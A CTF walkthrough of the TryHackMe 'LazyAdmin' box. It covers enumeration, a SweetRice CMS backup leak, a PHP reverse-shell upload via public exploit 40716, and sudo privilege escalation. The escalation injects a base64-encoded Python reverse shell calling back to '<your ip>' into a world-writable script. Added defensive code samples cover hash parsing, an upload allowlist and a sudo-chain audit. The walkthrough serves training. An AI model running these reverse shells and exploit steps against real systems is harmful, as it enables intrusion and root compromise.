
TryHackMe: LazyAdmin


Enumeration

Started with a port scan:

root@docker-desktop:~# ports=$(nmap -p- --min-rate=1000 -T5 10.10.66.23 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
root@docker-desktop:~# nmap -sC -sV -p$ports 10.10.66.23
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 10:53 UTC
Nmap scan report for 10.10.66.23
Host is up (0.054s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.71 seconds

Port 80 is open, so I ran a directory brute-force, and after a few seconds it found the directory /content. (The first rows of the output are the wordlist's comment lines, which wfuzz sends as payloads; since "#" starts a URL fragment, each of them just fetches the root page and returns the same 11321-character response, so they can be ignored or filtered with --hh 11321.)

root@docker-desktop:~# wfuzz -L --hc 404 -c -z file,/root/shared/wordlists/web_dictionaries/directory-list-2.3-medium.txt -u http://10.10.66.23/FUZZ

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.66.23/FUZZ
Total requests: 220560

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000001:   200        375 L    968 W    11321 Ch    "# directory-list-2.3-medium.txt"
000000002:   200        375 L    968 W    11321 Ch    "#"
000000003:   200        375 L    968 W    11321 Ch    "# Copyright 2007 James Fisher"
000000004:   200        375 L    968 W    11321 Ch    "#"
000000005:   200        375 L    968 W    11321 Ch    "# This work is licensed under the Creative Commons"
000000006:   200        375 L    968 W    11321 Ch    "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000007:   200        375 L    968 W    11321 Ch    "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000008:   200        375 L    968 W    11321 Ch    "# or send a letter to Creative Commons, 171 Second Street,"
000000009:   200        375 L    968 W    11321 Ch    "# Suite 300, San Francisco, California, 94105, USA."
000000010:   200        375 L    968 W    11321 Ch    "#"
000000011:   200        375 L    968 W    11321 Ch    "# Priority ordered case sensative list, where entries were found"
000000012:   200        375 L    968 W    11321 Ch    "# on atleast 2 different hosts"
000000013:   200        375 L    968 W    11321 Ch    "#"
000000014:   200        375 L    968 W    11321 Ch    ""
000000075:   200        35 L     151 W    2197 Ch     "content"

The landing page of that directory reveals that it is running the SweetRice CMS:
[Screenshot: landing page]

Then I searched for known vulnerabilities in that CMS with searchsploit:

root@docker-desktop:~# searchsploit sweetrice
-------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload                                 | php/webapps/14184.txt
SweetRice 0.5.3 - Remote File Inclusion                                               | php/webapps/10246.txt
SweetRice 0.6.7 - Multiple Vulnerabilities                                            | php/webapps/15413.txt
SweetRice 1.5.1 - Arbitrary File Download                                             | php/webapps/40698.py
SweetRice 1.5.1 - Arbitrary File Upload                                               | php/webapps/40716.py
SweetRice 1.5.1 - Backup Disclosure                                                   | php/webapps/40718.txt
SweetRice 1.5.1 - Cross-Site Request Forgery                                          | php/webapps/40692.html
SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution                     | php/webapps/40700.html
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

There is a backup disclosure vulnerability: all we have to do is browse to http://ip/content/inc/mysql_backup and download the backup:

curl http://10.10.66.23/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql -o backup.sql

Inside the backup we get some credentials:

root@docker-desktop:~/Documents/lazyadmin# cat backup.sql | grep pass
  14 => 'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin&#039;s Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";s:5:\\"close\\";i:1;s:9:\\"close_tip\\";s:454:\\"<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p><h1>This site is building now , please come late.</h1><p>If you are the webmaster,please go to Dashboard -> General -> Website setting </p><p>and uncheck the checkbox \\"Site close\\" to open your website.</p><p>More help at <a href=\\"http://www.basic-cms.org/docs/5-things-need-to-be-done-when-SweetRice-installed/\\">Tip for Basic CMS SweetRice installed</a></p>\\";s:5:\\"cache\\";i:0;s:13:\\"cache_expired\\";i:0;s:10:\\"user_track\\";i:0;s:11:\\"url_rewrite\\";i:0;s:4:\\"logo\\";s:0:\\"\\";s:5:\\"theme\\";s:0:\\"\\";s:4:\\"lang\\";s:9:\\"en-us.php\\";s:11:\\"admin_email\\";N;}\',\'1575023409\');',

The admin user is manager, and the password is stored as a hash (the 32-character passwd value), so we have to crack it.

Afterwards I analysed the CMS directory structure using its GitHub repository, but didn't find an easy way to upload and execute PHP from the web:
[Screenshot: CMS structure]
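The credentials in the dump are buried inside a PHP serialize() blob (the `a:17:{s:4:"name";...}` value of global_setting). The following is an added example, not code from the writeup or from SweetRice: a small reader for that format that pulls out the admin name and password hash, plus the check that shows why an exposed backup is as good as a leaked password here, since the hash is an unsalted MD5 digest that a single hash call per guess can test. The SAMPLE_SETTING string is constructed from the grep output above with the SQL escaping undone and the long close_tip HTML removed.

```python
import hashlib

# Constructed sample: the `global_setting` value from the dump after the SQL
# escaping (\\" and \') is undone, cut down to the fields that matter.  Field
# names and the hash are the ones in the grep output of the backup.
SAMPLE_SETTING = (
    'a:6:{'
    's:4:"name";s:25:"Lazy Admin&#039;s Website";'
    's:6:"author";s:10:"Lazy Admin";'
    's:5:"admin";s:7:"manager";'
    's:6:"passwd";s:32:"42f749ade7f9e195bf475f37a44cafcb";'
    's:5:"close";i:1;'
    's:11:"admin_email";N;'
    '}'
)


class PhpUnserializer:
    """Minimal reader for PHP serialize() output: N, i, b, d, s and a.

    String lengths in the format are byte counts; this reader works on str,
    which is exact for ASCII data such as the sample above.
    """

    def __init__(self, data: str):
        self.data = data
        self.pos = 0

    def parse(self):
        value = self._value()
        if self.pos != len(self.data):
            raise ValueError(f"trailing data at offset {self.pos}")
        return value

    def _expect(self, literal: str) -> None:
        if not self.data.startswith(literal, self.pos):
            raise ValueError(f"expected {literal!r} at offset {self.pos}")
        self.pos += len(literal)

    def _until(self, delimiter: str) -> str:
        end = self.data.index(delimiter, self.pos)
        token = self.data[self.pos:end]
        self.pos = end + 1
        return token

    def _value(self):
        tag = self.data[self.pos]
        self.pos += 1
        if tag == "N":                      # null
            self._expect(";")
            return None
        self._expect(":")
        if tag == "i":                      # integer
            return int(self._until(";"))
        if tag == "b":                      # boolean
            return self._until(";") == "1"
        if tag == "d":                      # float
            return float(self._until(";"))
        if tag == "s":                      # length-prefixed string
            length = int(self._until(":"))
            self._expect('"')
            text = self.data[self.pos:self.pos + length]
            self.pos += length
            self._expect('";')
            return text
        if tag == "a":                      # array: count, then key/value pairs
            count = int(self._until(":"))
            self._expect("{")
            items = {}
            for _ in range(count):
                key = self._value()
                items[key] = self._value()
            self._expect("}")
            return items
        raise ValueError(f"unsupported type tag {tag!r} at offset {self.pos - 1}")


def admin_credentials(serialized: str):
    """Return (admin user, stored password hash) from a global_setting blob."""
    settings = PhpUnserializer(serialized).parse()
    return settings["admin"], settings["passwd"]


def hash_matches(candidate: str, stored_md5_hex: str) -> bool:
    # The stored value is a bare 32-hex-char digest with no salt, so one MD5
    # call per guess is all it takes to test a candidate password offline.
    return hashlib.md5(candidate.encode()).hexdigest() == stored_md5_hex


if __name__ == "__main__":
    user, digest = admin_credentials(SAMPLE_SETTING)
    print(f"admin user: {user}, stored hash: {digest}")
    print("unsalted MD5 of the password used later in this writeup matches:",
          hash_matches("Password123", digest))
```

The takeaway for the defensive side is that the two weaknesses compound: a backup directory served by the web server, and a credential store that keeps an unsalted fast hash. Either one alone is bad; together they turn a file listing into an admin login.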

Intrusion

As the searchsploit results above show, there is an arbitrary file upload for this version (40716), so I used it to upload a PHP reverse shell:

root@docker-desktop:~/Documents/lazyadmin# searchsploit -m 40716
root@docker-desktop:~/Documents/lazyadmin# python3 40716.py

+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
|  _________                      __ __________.__                  |
| /   _____/_  _  __ ____   _____/  |\______   \__| ____  ____      |
| \_____  \ \/ \/ // __ \_/ __ \   __\       _/  |/ ___\/ __ \     |
| /        \     /\  ___/\  ___/|  | |    |   \  \  \__\  ___/     |
|/_______  / \/\_/  \___  >\___  >__| |____|_  /__|\___  >___  >    |
|        \/             \/     \/            \/        \/    \/     |
|    > SweetRice 1.5.1 Unrestricted File Upload                     |
|    > Script Cod3r : Ehsan Hosseini                                |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+

Enter The Target URL(Example : localhost.com) : 10.10.66.23/content
Enter Username : manager
Enter Password : Password123
Enter FileName (Example:.htaccess,shell.php5,index.html) : php-reverse-shell.php5
[+] Sending User&Pass...
[+] Login Succssfully...
[+] File Uploaded...
[+] URL : http://10.10.66.23/content/attachment/php-reverse-shell.php5

Once the reverse shell was uploaded, I listened for connections with netcat in one terminal:

root@docker-desktop:~/Documents/lazyadmin# nc -lvp 443

And in another terminal triggered the reverse shell by requesting the uploaded file:

root@docker-desktop:~/Documents/lazyadmin# curl http://10.10.66.23/content/attachment/php-reverse-shell.php5

Once inside, I upgraded to an interactive TTY:

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@THM-Chal:/$ export TERM=xterm

Then I located and read the user flag:

www-data@THM-Chal:/var/www$ find / -name 'user.txt' 2>/dev/null
/home/itguy/user.txt
www-data@THM-Chal:/var/www$ cat /home/itguy/user.txt
THM{63e5bce9***************6f1ac8a07}
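The upload script's own prompt (".htaccess, shell.php5, index.html") shows what the attachment endpoint lets through: a name that merely avoids the literal ".php" extension. The following is an added example, not code from the writeup or from SweetRice, contrasting that kind of denylist with an allowlist validator that a defender would put in front of an attachment store. ALLOWED_EXTENSIONS and the function names are assumptions for the example.

```python
import os
import re

# Constructed allowlist for an attachment endpoint that only needs documents
# and images.  Anything else, however it is spelled, is refused.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}

# The kind of check the .php5 suggestion in the exploit prompt is built for.
DENYLIST_NAIVE = {"php"}

NAME_PATTERN = re.compile(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)+")


def naive_denylist_check(filename: str) -> bool:
    """Accepts the file unless its last extension is exactly 'php'.

    Alternate extensions the server may still execute (php5, phtml) and
    server-config dotfiles (.htaccess) are not on the list, so they pass.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in DENYLIST_NAIVE


def safe_upload_name(filename: str):
    """Return the sanitised basename to store under, or None to reject."""
    name = os.path.basename(filename)            # drop any path component
    if name in ("", ".", "..") or name.startswith("."):
        return None                               # dotfiles such as .htaccess
    if not NAME_PATTERN.fullmatch(name):
        return None                               # odd characters, no extension
    parts = name.lower().split(".")
    # Every extension after the first dot must be allowed, so a double
    # extension such as shell.php5.png is rejected as well.
    if not all(part in ALLOWED_EXTENSIONS for part in parts[1:]):
        return None
    return name


if __name__ == "__main__":
    for candidate in ("php-reverse-shell.php5", ".htaccess", "shell.php", "photo.JPG"):
        print(f"{candidate:26} denylist={naive_denylist_check(candidate)!s:5} "
              f"allowlist={safe_upload_name(candidate)}")
```

The validator is only half of the fix: the directory the attachments land in should also be served without script execution (for mod_php that means disabling the PHP engine for that directory), so that a name that somehow gets past the check is still just a file.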

Privesc

First I checked the sudo permissions. We can execute a Perl script as root without a password:

www-data@THM-Chal:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
www-data@THM-Chal:/$ cat /home/itguy/backup.pl
cat /home/itguy/backup.pl
#!/usr/bin/perl

system("sh", "/etc/copy.sh");
www-data@THM-Chal:/$ ls -lisha /etc/copy.sh
ls -lisha /etc/copy.sh
1050508 4.0K -rw-r--rwx 1 root root 347 Jun 15 15:48 /etc/copy.sh
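The weakness here is not the sudo rule itself but what it reaches: a root-run wrapper that hands off to /etc/copy.sh, whose mode -rw-r--rwx makes it writable by everyone. The following is an added example, not code from the writeup, of an audit that follows a Perl wrapper's system("sh", "...") calls and flags any file in the chain that non-owners can modify. It builds a throwaway sandbox that mirrors the box's layout (constructed paths, mode 0647 as shown by ls above) rather than touching real system files.

```python
import os
import re
import stat
import tempfile

# Matches the only pattern used by backup.pl: system("sh", "<path>")
SYSTEM_SH = re.compile(r'system\(\s*"sh"\s*,\s*"([^"]+)"\s*\)')


def build_sandbox():
    """Constructed replica of the box: backup.pl -> copy.sh, copy.sh mode 0647."""
    directory = tempfile.mkdtemp()
    copy_sh = os.path.join(directory, "copy.sh")
    with open(copy_sh, "w") as f:
        f.write("#!/bin/sh\necho backup placeholder\n")
    os.chmod(copy_sh, 0o647)                 # -rw-r--rwx, as in the ls output
    backup_pl = os.path.join(directory, "backup.pl")
    with open(backup_pl, "w") as f:
        f.write(f'#!/usr/bin/perl\n\nsystem("sh", "{copy_sh}");\n')
    os.chmod(backup_pl, 0o644)               # the wrapper itself is fine
    return directory, backup_pl, copy_sh


def script_targets(perl_path: str) -> list:
    """Paths the Perl wrapper executes through the shell, in order."""
    with open(perl_path) as f:
        return SYSTEM_SH.findall(f.read())


def writable_by_non_owner(path: str) -> bool:
    """True if the group or world write bit is set on the file."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_wrapper(perl_path: str) -> list:
    """Files in the sudo chain that a non-owner could rewrite (empty == clean).

    Both the wrapper and everything it calls are checked, because the sudo
    rule runs the wrapper as root and the wrapper runs the rest.
    """
    chain = [perl_path] + script_targets(perl_path)
    return [path for path in chain if writable_by_non_owner(path)]


def harden(path: str) -> None:
    """Remove group/world write.  On a real host also make sure root owns it."""
    os.chmod(path, 0o644)


if __name__ == "__main__":
    sandbox_dir, perl, target = build_sandbox()
    print("findings before:", audit_wrapper(perl))
    harden(target)
    print("findings after: ", audit_wrapper(perl))
```

The same check belongs in any review of sudoers: resolve each NOPASSWD command to the files it actually executes, and treat a writable link anywhere in that chain as equivalent to handing out root.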

Since /etc/copy.sh is world-writable (the trailing rwx in its mode) and backup.pl runs it as root, all we have to do at this stage is add a reverse shell to /etc/copy.sh.
I encoded a Python reverse shell as base64:

root@docker-desktop:~/Documents/lazyadmin# base64 -w0 <<'EOF'
python3 -c 'import socket,subprocess,os; 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); 
s.connect(("<your ip>",444)); os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); 
p=subprocess.call(["/bin/sh","-i"]);'
EOF

Then I listened for connections on port 444:

root@docker-desktop:~/Documents/lazyadmin# nc -lvp 444

Finally, write it into /etc/copy.sh and run the backup script with sudo:

www-data@THM-Chal:/$ echo 'echo "base64 payload" | base64 -d | bash -s ' > /etc/copy.sh
www-data@THM-Chal:/$ sudo /usr/bin/perl /home/itguy/backup.pl
sudo /usr/bin/perl /home/itguy/backup.pl

Now we are root:

# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
THM{6637f41***************775124699f}
WRITTEN BY
ITasahobby
InTernet lover